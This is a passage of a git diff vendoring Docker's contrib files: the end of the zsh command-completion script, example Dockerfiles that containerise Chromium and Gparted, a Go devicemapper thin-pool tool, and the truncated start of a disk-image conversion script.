_arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help)--advertise-addr=[Advertised address]:ip\:port: " \ + "($help)--availability=[Availability of the node]:availability:(active drain pause)" \ + "($help)--listen-addr=[Listen address]:ip\:port: " \ + "($help)--token=[Token for entry into the swarm]:secret: " \ + "($help -):host\:port: " && ret=0 + ;; + (join-token) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -q --quiet)"{-q,--quiet}"[Only display token]" \ + "($help)--rotate[Rotate join token]" \ + "($help -):role:(manager worker)" && ret=0 + ;; + (leave) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --force)"{-f,--force}"[Force this node to leave the swarm, ignoring warnings]" && ret=0 + ;; + (update) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--cert-expiry=[Validity period for node certificates]:duration: " \ + "($help)*--external-ca=[Specifications of one or more certificate signing endpoints]:endpoint: " \ + "($help)--dispatcher-heartbeat=[Dispatcher heartbeat period]:duration: " \ + "($help)--max-snapshots[Number of additional Raft snapshots to retain]" \ + "($help)--snapshot-interval[Number of log entries between Raft snapshots]" \ + "($help)--task-history-limit=[Task history retention limit]:limit: " && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_network_commands" && ret=0 + ;; + esac + + return ret +} + +# EO swarm + +# BO system + +__docker_system_commands() { + local -a _docker_system_subcommands + _docker_system_subcommands=( + "df:Show docker filesystem usage" + "events:Get real time events from the server" + "info:Display system-wide information" + "prune:Remove unused data" + ) + _describe -t docker-system-commands "docker system command" _docker_system_subcommands +} + +__docker_system_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (df) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -v --verbose)"{-v,--verbose}"[Show detailed information on space usage]" && ret=0 + ;; + (events) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*"{-f=,--filter=}"[Filter values]:filter:__docker_complete_events_filter" \ + "($help)--since=[Events created since this timestamp]:timestamp: " \ + "($help)--until=[Events created until this timestamp]:timestamp: " \ + "($help)--format=[Format the output using the given go template]:template: " && ret=0 + ;; + (info) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " && ret=0 + ;; + (prune) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all)"{-a,--all}"[Remove all unused data, not just dangling ones]" \ + "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ + "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_volume_commands" && ret=0 + ;; + esac + + return ret +} + +# EO system + +# BO volume + +__docker_volume_complete_ls_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (dangling) + dangling_opts=('true' 'false') + _describe -t dangling-filter-opts "Dangling Filter Options" dangling_opts && ret=0 + ;; + (driver) + __docker_complete_info_plugins Volume && ret=0 + ;; + (name) + __docker_complete_volumes && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('dangling' 'driver' 'label' 'name') + _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_complete_volumes() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + declare -a lines volumes + + lines=(${(f)${:-"$(_call_program commands docker $docker_options volume ls)"$'\n'}}) + + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 + lines=(${lines[2,-1]}) + + # Names + local line s + for line in $lines; do + s="${line[${begin[VOLUME NAME]},${end[VOLUME NAME]}]%% ##}" + s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}" + volumes=($volumes $s) + done + + _describe -t volumes-list "volumes" volumes && ret=0 + return ret +} + +__docker_volume_commands() { + local -a _docker_volume_subcommands + _docker_volume_subcommands=( + "create:Create a volume" + "inspect:Display detailed information on one or more volumes" + "ls:List volumes" + "prune:Remove all unused volumes" + "rm:Remove one or more volumes" + ) + _describe -t docker-volume-commands "docker volume command" _docker_volume_subcommands +} + +__docker_volume_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (create) + _arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help -d --driver)"{-d=,--driver=}"[Volume driver name]:Driver name:(local)" \ + "($help)*--label=[Set metadata for a volume]:label=value: " \ + "($help)*"{-o=,--opt=}"[Driver specific options]:Driver option: " \ + "($help -)1:Volume name: " && ret=0 + ;; + (inspect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ + "($help -)1:volume:__docker_complete_volumes" && ret=0 + ;; + (ls) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ + "($help)--format=[Pretty-print volumes using a Go template]:template: " \ + "($help -q --quiet)"{-q,--quiet}"[Only display volume names]" && ret=0 + case $state in + (filter-options) + __docker_volume_complete_ls_filters && ret=0 + ;; + esac + ;; + (prune) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 + ;; + (rm) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --force)"{-f,--force}"[Force the removal of one or more volumes]" \ + "($help -):volume:__docker_complete_volumes" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_volume_commands" && ret=0 + ;; + esac + + return ret +} + +# EO volume + +__docker_caching_policy() { + oldp=( "$1"(Nmh+1) ) # 1 hour + (( $#oldp )) +} + +__docker_commands() { + local cache_policy + + zstyle -s ":completion:${curcontext}:" cache-policy cache_policy + if [[ -z "$cache_policy" ]]; then + zstyle ":completion:${curcontext}:" cache-policy __docker_caching_policy + fi + + if ( [[ ${+_docker_subcommands} -eq 0 ]] || _cache_invalid docker_subcommands) \ + && ! _retrieve_cache docker_subcommands; + then + local -a lines + lines=(${(f)"$(_call_program commands docker 2>&1)"}) + _docker_subcommands=(${${${(M)${lines[$((${lines[(i)*Commands:]} + 1)),-1]}:# *}## #}/ ##/:}) + _docker_subcommands=($_docker_subcommands 'daemon:Enable daemon mode' 'help:Show help for a command') + (( $#_docker_subcommands > 2 )) && _store_cache docker_subcommands _docker_subcommands + fi + _describe -t docker-commands "docker command" _docker_subcommands +} + +__docker_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (attach|commit|cp|create|diff|exec|export|kill|logs|pause|unpause|port|rename|restart|rm|run|start|stats|stop|top|update|wait) + __docker_container_subcommand && ret=0 + ;; + (build|history|import|load|pull|push|save|tag) + __docker_image_subcommand && ret=0 + ;; + (container) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_container_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_container_subcommand && ret=0 + ;; + esac + ;; + (daemon) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*--add-runtime=[Register an additional OCI compatible runtime]:runtime:__docker_complete_runtimes" \ + "($help)--api-cors-header=[CORS headers in the Engine API]:CORS headers: " \ + "($help)*--authorization-plugin=[Authorization plugins to load]" \ + "($help -b --bridge)"{-b=,--bridge=}"[Attach containers to a network bridge]:bridge:_net_interfaces" \ + "($help)--bip=[Network bridge IP]:IP address: " \ + "($help)--cgroup-parent=[Parent cgroup for all containers]:cgroup: " \ + "($help)--cluster-advertise=[Address or interface name to advertise]:Instance to advertise (host\:port): " \ + "($help)--cluster-store=[URL of the distributed storage backend]:Cluster Store:->cluster-store" \ + "($help)*--cluster-store-opt=[Cluster store options]:Cluster options:->cluster-store-options" \ + "($help)--config-file=[Path to daemon configuration file]:Config File:_files" \ + "($help)--containerd=[Path to containerd socket]:socket:_files -g \"*.sock\"" \ + "($help -D --debug)"{-D,--debug}"[Enable debug mode]" \ + "($help)--default-gateway[Container default gateway IPv4 address]:IPv4 address: " \ + "($help)--default-gateway-v6[Container default gateway IPv6 address]:IPv6 address: " \ + "($help)*--default-ulimit=[Default ulimits for containers]:ulimit: " \ + "($help)--disable-legacy-registry[Disable contacting legacy registries]" \ + "($help)*--dns=[DNS server to use]:DNS: " \ + "($help)*--dns-opt=[DNS options to use]:DNS option: " \ + "($help)*--dns-search=[DNS search domains to use]:DNS search: " \ + "($help)*--exec-opt=[Runtime execution options]:runtime execution options: " \ + "($help)--exec-root=[Root directory for execution state files]:path:_directories" \ + "($help)--experimental[Enable experimental features]" \ + "($help)--fixed-cidr=[IPv4 subnet for fixed IPs]:IPv4 subnet: " \ + "($help)--fixed-cidr-v6=[IPv6 subnet for fixed IPs]:IPv6 subnet: " \ + "($help -G --group)"{-G=,--group=}"[Group for the unix socket]:group:_groups" \ + "($help -g --graph)"{-g=,--graph=}"[Root of the Docker runtime]:path:_directories" \ + "($help -H --host)"{-H=,--host=}"[tcp://host:port to bind/connect to]:host: " \ + "($help)--icc[Enable inter-container communication]" \ + "($help)--init[Run an init inside containers to forward signals and reap processes]" \ + "($help)--init-path=[Path to the docker-init binary]:docker-init binary:_files" \ + "($help)*--insecure-registry=[Enable insecure registry communication]:registry: " \ + "($help)--ip=[Default IP when binding container ports]" \ + "($help)--ip-forward[Enable net.ipv4.ip_forward]" \ + "($help)--ip-masq[Enable IP masquerading]" \ + "($help)--iptables[Enable addition of iptables rules]" \ + "($help)--ipv6[Enable IPv6 networking]" \ + "($help -l --log-level)"{-l=,--log-level=}"[Logging level]:level:(debug info warn error fatal)" \ + "($help)*--label=[Key=value labels]:label: " \ + "($help)--live-restore[Enable live restore of docker when containers are still running]" \ + "($help)--log-driver=[Default driver for container logs]:logging driver:__docker_complete_log_drivers" \ + "($help)*--log-opt=[Default log driver options for containers]:log driver options:__docker_complete_log_options" \ + "($help)--max-concurrent-downloads[Set the max concurrent downloads for each pull]" \ + "($help)--max-concurrent-uploads[Set the max concurrent uploads for each push]" \ + "($help)--mtu=[Network MTU]:mtu:(0 576 1420 1500 9000)" \ + "($help)--oom-score-adjust=[Set the oom_score_adj for the daemon]:oom-score:(-500)" \ + "($help -p --pidfile)"{-p=,--pidfile=}"[Path to use for daemon PID file]:PID file:_files" \ + "($help)--raw-logs[Full timestamps without ANSI coloring]" \ + "($help)*--registry-mirror=[Preferred Docker registry mirror]:registry mirror: " \ + "($help)--seccomp-profile=[Path to seccomp profile]:path:_files -g \"*.json\"" \ + "($help -s --storage-driver)"{-s=,--storage-driver=}"[Storage driver to use]:driver:(aufs btrfs devicemapper overlay overlay2 vfs zfs)" \ + "($help)--selinux-enabled[Enable selinux support]" \ + "($help)--shutdown-timeout=[Set the shutdown timeout value in seconds]:time: " \ + "($help)*--storage-opt=[Storage driver options]:storage driver options: " \ + "($help)--tls[Use TLS]" \ + "($help)--tlscacert=[Trust certs signed only by this CA]:PEM file:_files -g \"*.(pem|crt)\"" \ + "($help)--tlscert=[Path to TLS certificate file]:PEM file:_files -g \"*.(pem|crt)\"" \ + "($help)--tlskey=[Path to TLS key file]:Key file:_files -g \"*.(pem|key)\"" \ + "($help)--tlsverify[Use TLS and verify the remote]" \ + "($help)--userns-remap=[User/Group setting for user namespaces]:user\:group:->users-groups" \ + "($help)--userland-proxy[Use userland proxy for loopback traffic]" \ + "($help)--userland-proxy-path=[Path to the userland proxy binary]:binary:_files" && ret=0 + + case $state in + (cluster-store) + if compset -P '*://'; then + _message 'host:port' && ret=0 + else + store=('consul' 'etcd' 'zk') + _describe -t cluster-store "Cluster Store" store -qS "://" && ret=0 + fi + ;; + (cluster-store-options) + if compset -P '*='; then + _files && ret=0 + else + opts=('discovery.heartbeat' 'discovery.ttl' 'kv.cacertfile' 'kv.certfile' 'kv.keyfile' 'kv.path') + _describe -t cluster-store-opts "Cluster Store Options" opts -qS "=" && ret=0 + fi + ;; + (users-groups) + if compset -P '*:'; then + _groups && ret=0 + else + _describe -t userns-default "default Docker user management" '(default)' && ret=0 + _users && ret=0 + fi + ;; + esac + ;; + (events|info) + __docker_system_subcommand && ret=0 + ;; + (image) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_image_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_image_subcommand && ret=0 + ;; + esac + ;; + (images) + words[1]='ls' + __docker_image_subcommand && ret=0 + ;; + (inspect) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ + "($help -s --size)"{-s,--size}"[Display total file sizes if the type is container]" \ + "($help)--type=[Return JSON for specified type]:type:(container image network node plugin service volume)" \ + "($help -)*: :->values" && ret=0 + + case $state in + (values) + if [[ ${words[(r)--type=container]} == --type=container ]]; then + __docker_complete_containers && ret=0 + elif [[ ${words[(r)--type=image]} == --type=image ]]; then + __docker_complete_images && ret=0 + elif [[ ${words[(r)--type=network]} == --type=network ]]; then + __docker_complete_networks && ret=0 + elif [[ ${words[(r)--type=node]} == --type=node ]]; then + __docker_complete_nodes && ret=0 + elif [[ ${words[(r)--type=plugin]} == --type=plugin ]]; then + __docker_complete_plugins && ret=0 + elif [[ ${words[(r)--type=service]} == --type=service ]]; then + __docker_complete_services && ret=0 + elif [[ ${words[(r)--type=volume]} == --type=volume ]]; then + __docker_complete_volumes && ret=0 + else + __docker_complete_containers + __docker_complete_images + __docker_complete_networks + __docker_complete_nodes + __docker_complete_plugins + __docker_complete_services + __docker_complete_volumes && ret=0 + fi + ;; + esac + ;; + (login) + _arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help -p --password)"{-p=,--password=}"[Password]:password: " \ + "($help -u --user)"{-u=,--user=}"[Username]:username: " \ + "($help -)1:server: " && ret=0 + ;; + (logout) + _arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help -)1:server: " && ret=0 + ;; + (network) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_network_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_network_subcommand && ret=0 + ;; + esac + ;; + (node) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_node_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_node_subcommand && ret=0 + ;; + esac + ;; + (plugin) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_plugin_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_plugin_subcommand && ret=0 + ;; + esac + ;; + (ps) + words[1]='ls' + __docker_container_subcommand && ret=0 + ;; + (rmi) + words[1]='rm' + __docker_image_subcommand && ret=0 + ;; + (search) + _arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help)*"{-f=,--filter=}"[Filter values]:filter:->filter-options" \ + "($help)--limit=[Maximum returned search results]:limit:(1 5 10 25 50)" \ + "($help)--no-trunc[Do not truncate output]" \ + "($help -):term: " && ret=0 + + case $state in + (filter-options) + __docker_complete_search_filters && ret=0 + ;; + esac + ;; + (secret) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_secret_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_secret_subcommand && ret=0 + ;; + esac + ;; + (service) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_service_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_service_subcommand && ret=0 + ;; + esac + ;; + (stack) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_stack_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_stack_subcommand && ret=0 + ;; + esac + ;; + (swarm) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_swarm_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_swarm_subcommand && ret=0 + ;; + esac + ;; + (system) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_system_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_system_subcommand && ret=0 + ;; + esac + ;; + (version) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " && ret=0 + ;; + (volume) + local curcontext="$curcontext" state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + case $state in + (command) + __docker_volume_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-${words[-1]}: + __docker_volume_subcommand && ret=0 + ;; + esac + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_commands" && ret=0 + ;; + esac + + return ret +} + +_docker() { + # Support for subservices, which allows for `compdef _docker docker-shell=_docker_containers`. + # Based on /usr/share/zsh/functions/Completion/Unix/_git without support for `ret`. + if [[ $service != docker ]]; then + _call_function - _$service + return + fi + + local curcontext="$curcontext" state line help="-h --help" + integer ret=1 + typeset -A opt_args + + _arguments $(__docker_arguments) -C \ + "(: -)"{-h,--help}"[Print usage]" \ + "($help)--config[Location of client config files]:path:_directories" \ + "($help -D --debug)"{-D,--debug}"[Enable debug mode]" \ + "($help -H --host)"{-H=,--host=}"[tcp://host:port to bind/connect to]:host: " \ + "($help -l --log-level)"{-l=,--log-level=}"[Logging level]:level:(debug info warn error fatal)" \ + "($help)--tls[Use TLS]" \ + "($help)--tlscacert=[Trust certs signed only by this CA]:PEM file:_files -g "*.(pem|crt)"" \ + "($help)--tlscert=[Path to TLS certificate file]:PEM file:_files -g "*.(pem|crt)"" \ + "($help)--tlskey=[Path to TLS key file]:Key file:_files -g "*.(pem|key)"" \ + "($help)--tlsverify[Use TLS and verify the remote]" \ + "($help)--userland-proxy[Use userland proxy for loopback traffic]" \ + "($help -v --version)"{-v,--version}"[Print version information and quit]" \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + local host=${opt_args[-H]}${opt_args[--host]} + local config=${opt_args[--config]} + local docker_options="${host:+--host $host} ${config:+--config $config}" + + case $state in + (command) + __docker_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-$words[1]: + __docker_subcommand && ret=0 + ;; + esac + + return ret +} + +_dockerd() { + integer ret=1 + words[1]='daemon' + __docker_subcommand && ret=0 + return ret +} + +_docker "$@" + +# Local Variables: +# mode: Shell-Script +# sh-indentation: 4 +# indent-tabs-mode: nil +# sh-basic-offset: 4 +# End: +# vim: ft=zsh sw=4 ts=4 et diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/README.md b/vendor/github.com/docker/docker/contrib/desktop-integration/README.md new file mode 100644 index 0000000000..85a01b9ee9 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/desktop-integration/README.md @@ -0,0 +1,11 @@ +Desktop Integration +=================== + +The ./contrib/desktop-integration contains examples of typical dockerized +desktop applications. + +Examples +======== + +* Chromium: ./chromium/Dockerfile shows a way to dockerize a common application +* Gparted: ./gparted/Dockerfile shows a way to dockerize a common application w devices diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile b/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile new file mode 100644 index 0000000000..5cacd1f999 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile @@ -0,0 +1,36 @@ +# VERSION: 0.1 +# DESCRIPTION: Create chromium container with its dependencies +# AUTHOR: Jessica Frazelle +# COMMENTS: +# This file describes how to build a Chromium container with all +# dependencies installed. It uses native X11 unix socket. +# Tested on Debian Jessie +# USAGE: +# # Download Chromium Dockerfile +# wget http://raw.githubusercontent.com/docker/docker/master/contrib/desktop-integration/chromium/Dockerfile +# +# # Build chromium image +# docker build -t chromium . +# +# # Run stateful data-on-host chromium. For ephemeral, remove -v /data/chromium:/data +# docker run -v /data/chromium:/data -v /tmp/.X11-unix:/tmp/.X11-unix \ +# -e DISPLAY=unix$DISPLAY chromium + +# # To run stateful dockerized data containers +# docker run --volumes-from chromium-data -v /tmp/.X11-unix:/tmp/.X11-unix \ +# -e DISPLAY=unix$DISPLAY chromium + +# Base docker image +FROM debian:jessie +MAINTAINER Jessica Frazelle + +# Install Chromium +RUN apt-get update && apt-get install -y \ + chromium \ + chromium-l10n \ + libcanberra-gtk-module \ + libexif-dev \ + --no-install-recommends + +# Autorun chromium +CMD ["/usr/bin/chromium", "--no-sandbox", "--user-data-dir=/data"] diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile b/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile new file mode 100644 index 0000000000..3ddb23208d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile @@ -0,0 +1,31 @@ +# VERSION: 0.1 +# DESCRIPTION: Create gparted container with its dependencies +# AUTHOR: Jessica Frazelle +# COMMENTS: +# This file describes how to build a gparted container with all +# dependencies installed. It uses native X11 unix socket. +# Tested on Debian Jessie +# USAGE: +# # Download gparted Dockerfile +# wget http://raw.githubusercontent.com/docker/docker/master/contrib/desktop-integration/gparted/Dockerfile +# +# # Build gparted image +# docker build -t gparted . +# +# docker run -v /tmp/.X11-unix:/tmp/.X11-unix \ +# --device=/dev/sda:/dev/sda \ +# -e DISPLAY=unix$DISPLAY gparted +# + +# Base docker image +FROM debian:jessie +MAINTAINER Jessica Frazelle + +# Install Gparted and its dependencies +RUN apt-get update && apt-get install -y \ + gparted \ + libcanberra-gtk-module \ + --no-install-recommends + +# Autorun gparted +CMD ["/usr/sbin/gparted"] diff --git a/vendor/github.com/docker/docker/contrib/docker-device-tool/README.md b/vendor/github.com/docker/docker/contrib/docker-device-tool/README.md new file mode 100644 index 0000000000..6c54d5995f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/docker-device-tool/README.md @@ -0,0 +1,14 @@ +Docker device tool for devicemapper storage driver backend +=================== + +The ./contrib/docker-device-tool contains a tool to manipulate devicemapper thin-pool. + +Compile +======== + + $ make shell + ## inside build container + $ go build contrib/docker-device-tool/device_tool.go + + # if devicemapper version is old and compilation fails, compile with `libdm_no_deferred_remove` tag + $ go build -tags libdm_no_deferred_remove contrib/docker-device-tool/device_tool.go diff --git a/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go new file mode 100644 index 0000000000..906d064df6 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go @@ -0,0 +1,176 @@ +// +build !windows,!solaris + +package main + +import ( + "flag" + "fmt" + "os" + "path" + "sort" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver/devmapper" + "github.com/docker/docker/pkg/devicemapper" +) + +func usage() { + fmt.Fprintf(os.Stderr, "Usage: %s [status] | [list] | [device id] | [resize new-pool-size] | [snap new-id base-id] | [remove id] | [mount id mountpoint]\n", os.Args[0]) + flag.PrintDefaults() + os.Exit(1) +} + +func byteSizeFromString(arg string) (int64, error) { + digits := "" + rest := "" + last := strings.LastIndexAny(arg, "0123456789") + if last >= 0 { + digits = arg[:last+1] + rest = arg[last+1:] + } + + val, err := strconv.ParseInt(digits, 10, 64) + if err != nil { + return val, err + } + + rest = strings.ToLower(strings.TrimSpace(rest)) + + var multiplier int64 = 1 + switch rest { + case "": + multiplier = 1 + case "k", "kb": + multiplier = 1024 + case "m", "mb": + multiplier = 1024 * 1024 + case "g", "gb": + multiplier = 1024 * 1024 * 1024 + case "t", "tb": + multiplier = 1024 * 1024 * 1024 * 1024 + default: + return 0, fmt.Errorf("Unknown size unit: %s", rest) + } + + return val * multiplier, nil +} + +func main() { + root := flag.String("r", "/var/lib/docker", "Docker root dir") + flDebug := flag.Bool("D", false, "Debug mode") + + flag.Parse() + + if *flDebug { + os.Setenv("DEBUG", "1") + logrus.SetLevel(logrus.DebugLevel) + } + + if flag.NArg() < 1 { + usage() + } + + args := flag.Args() + + home := path.Join(*root, "devicemapper") + devices, err := devmapper.NewDeviceSet(home, false, nil, nil, nil) + if err != nil { + fmt.Println("Can't initialize device mapper: ", err) + os.Exit(1) + } + + switch args[0] { + case "status": + status := devices.Status() + fmt.Printf("Pool name: %s\n", status.PoolName) + fmt.Printf("Data Loopback file: %s\n", status.DataLoopback) + fmt.Printf("Metadata Loopback file: %s\n", status.MetadataLoopback) + fmt.Printf("Sector size: %d\n", status.SectorSize) + fmt.Printf("Data use: %d of %d (%.1f %%)\n", status.Data.Used, status.Data.Total, 100.0*float64(status.Data.Used)/float64(status.Data.Total)) + fmt.Printf("Metadata use: %d of %d (%.1f %%)\n", status.Metadata.Used, status.Metadata.Total, 100.0*float64(status.Metadata.Used)/float64(status.Metadata.Total)) + break + case "list": + ids := devices.List() + sort.Strings(ids) + for _, id := range ids { + fmt.Println(id) + } + break + case "device": + if flag.NArg() < 2 { + usage() + } + status, err := devices.GetDeviceStatus(args[1]) + if err != nil { + fmt.Println("Can't get device info: ", err) + os.Exit(1) + } + fmt.Printf("Id: %d\n", status.DeviceID) + fmt.Printf("Size: %d\n", status.Size) + fmt.Printf("Transaction Id: %d\n", status.TransactionID) + fmt.Printf("Size in Sectors: %d\n", status.SizeInSectors) + fmt.Printf("Mapped Sectors: %d\n", status.MappedSectors) + fmt.Printf("Highest Mapped Sector: %d\n", status.HighestMappedSector) + break + case "resize": + if flag.NArg() < 2 { + usage() + } + + size, err := byteSizeFromString(args[1]) + if err != nil { + fmt.Println("Invalid size: ", err) + os.Exit(1) + } + + err = devices.ResizePool(size) + if err != nil { + fmt.Println("Error resizing pool: ", err) + os.Exit(1) + } + + break + case "snap": + if flag.NArg() < 3 { + usage() + } + + err := devices.AddDevice(args[1], args[2], nil) + if err != nil { + fmt.Println("Can't create snap device: ", err) + os.Exit(1) + } + break + case "remove": + if flag.NArg() < 2 { + usage() + } + + err := devicemapper.RemoveDevice(args[1]) + if err != nil { + fmt.Println("Can't remove device: ", err) + os.Exit(1) + } + break + case "mount": + if flag.NArg() < 3 { + usage() + } + + err := devices.MountDevice(args[1], args[2], "") + if err != nil { + fmt.Println("Can't create snap device: ", err) + os.Exit(1) + } + break + default: + fmt.Printf("Unknown command %s\n", args[0]) + usage() + + os.Exit(1) + } + + return +} diff --git a/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool_windows.go b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool_windows.go new file mode 100644 index 0000000000..da29a2cadf --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool_windows.go @@ -0,0 +1,4 @@ +package main + +func main() { +} diff --git a/vendor/github.com/docker/docker/contrib/dockerize-disk.sh b/vendor/github.com/docker/docker/contrib/dockerize-disk.sh new file mode 100755 index 0000000000..444e243abe --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/dockerize-disk.sh @@ -0,0 +1,118 @@ +#!/usr/bin/env bash +set -e + +if ! command -v qemu-nbd &> /dev/null; then + echo >&2 'error: "qemu-nbd" not found!' + exit 1 +fi + +usage() { + echo "Convert disk image to docker image" + echo "" + echo "usage: $0 image-name disk-image-file [ base-image ]" + echo " ie: $0 cirros:0.3.3 cirros-0.3.3-x86_64-disk.img" + echo " $0 ubuntu:cloud ubuntu-14.04-server-cloudimg-amd64-disk1.img ubuntu:14.04" +} + +if [ "$#" -lt 2 ]; then + usage + exit 1 +fi + +CURDIR=$(pwd) + +image_name="${1%:*}" +image_tag="${1#*:}" +if [ "$image_tag" == "$1" ]; then + image_tag="latest" +fi + +disk_image_file="$2" +docker_base_image="$3" + +block_device=/dev/nbd0 + +builddir=$(mktemp -d) + +cleanup() { + umount "$builddir/disk_image" || true + umount "$builddir/workdir" || true + qemu-nbd -d $block_device &> /dev/null || true + rm -rf 